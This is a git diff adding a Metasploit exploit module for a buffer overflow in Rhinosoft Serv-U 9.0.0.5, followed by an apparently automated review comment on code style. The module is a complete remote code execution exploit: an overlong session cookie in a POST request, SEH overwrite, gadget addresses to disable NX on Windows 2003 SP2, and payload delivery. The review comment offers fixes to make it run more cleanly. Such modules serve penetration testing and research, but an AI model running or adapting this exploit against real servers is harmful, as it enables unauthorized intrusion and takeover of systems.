diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb
new file mode 100644
index 0000000000..585ec41acf
--- /dev/null
+++ b/modules/exploits/windows/http/servu_session_cookie.rb
@@ -0,0 +1,113 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Rhinosoft Serv-U Session Cookie Buffer Overflow',
+ 'Description' => %q{
+ This module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.
+ Sending a specially crafted POST request with an overly long session cookie
+ string, an attacker may be able to execute arbitrary code.
+ },
+ 'Author' =>
+ [
+ 'Nikolas Rangos nikolaos[at]rangos.de',
+ 'M.Yanagishita megumi1990[at]gmail.com ',
+ 'jduck jduck[at]metasploit.com'
+ ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'URL', 'http://rangos.de/ServU-ADV.txt' ],
+ [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071370.html' ],
+ ],
+ 'DefaultOptions' =>
+ {
+ 'EXITFUNC' => 'thread',
+ },
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'Space' => 512,
+ 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a",
+ 'StackAdjustment' => -3500,
+ 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Windows 2003 SP2 English (NX)',
+ {
+ 'FixESP' => 0x0fb02849, # add esp, 0x40c / ret @libeay32
+ 'FixESI' => 0x78a31e96, # pop esi / ret @mfc90u.dll
+ 'FixEBP' => 0x78a4ae99, # push esp / pop ebp / ret 0xc @mfc90u.dll
+ 'Ret' => 0x78a3e987, # ret 0x20 @mfc90u.dll
+ 'DisableNX' => 0x7c83f547, # NX Disable @ntdll.dll
+ 'JmpESP' => 0x78b2c753, # jmp esp @mfc90u.dll
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Nov 1 2009'))
+
+ register_options( [ Opt::RPORT(80) ], self.class )
+
+ end
+
+ def exploit
+
+ # hit end of stack..
+ # sploit = make_nops(50000)
+ sploit = rand_text(50000)
+
+ # new SEH handler
+ sploit[40948,4] = [target['FixESP']].pack('V')
+
+ # stack frame to bypass NX
+ sploit[0,4] = [target['FixESI']].pack('V')
+ sploit[4,4] = [0x10200].pack('V')
+ sploit[8,4] = [target['FixEBP']].pack('V')
+ sploit[12,4] = [target['Ret']].pack('V')
+ sploit[16,4] = [target['JmpESP']].pack('V')
+ sploit[20,4] = [target['DisableNX']].pack('V')
+ sploit[24,2] = "\xeb\x20"
+ sploit[40,payload.encoded.length] = payload.encoded
+
+ # TODO: randomize!
+ buf = "Cookie: killmenothing; SULang=de%%2CDE; themename=vista;"
+ buf << " Session=_d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814"
+ buf << sploit.unpack('H*')[0]
+ buf << "\r\n"
+ buf << "Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n"
+ buf << "Content-Length: 0\r\n"
+ buf << "\r\n";
+
+ req = "POST / HTTP/1.1\r\n"
+ req << "Host: #{rhost}:#{rport}\r\n"
+ req << buf
+ # req << "Content-Length: #{data.length}" + "\r\n\r\n" + data + "\r\n\r\n"
+
+ connect
+ print_status("Trying target #{target.name}..." % target['Ret'])
+ sock.put(req)
+
+ sleep(5)
+ handler
+ end
+
+end
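Review bot: The `% target['Ret']` on the `print_status` line in `exploit` is a leftover format operator applied to a string that contains no `%` directive, so the Ret value is never printed and Ruby silently discards the surplus argument (a warning under `-w`, an ArgumentError when `$DEBUG` is set); either drop it, `print_status("Trying target #{target.name}...")`, or format the address explicitly with `0x%.8x`. `connect` a line earlier is never paired with `disconnect`, so the socket stays open after `sock.put(req)` returns; add `disconnect` after `handler` so the connection is released when the module finishes. The stray `;` on `buf << "\r\n";`, the commented-out `make_nops` line and the commented-out `Content-Length` line are dead leftovers that should be removed or given a one-line comment saying why they are kept.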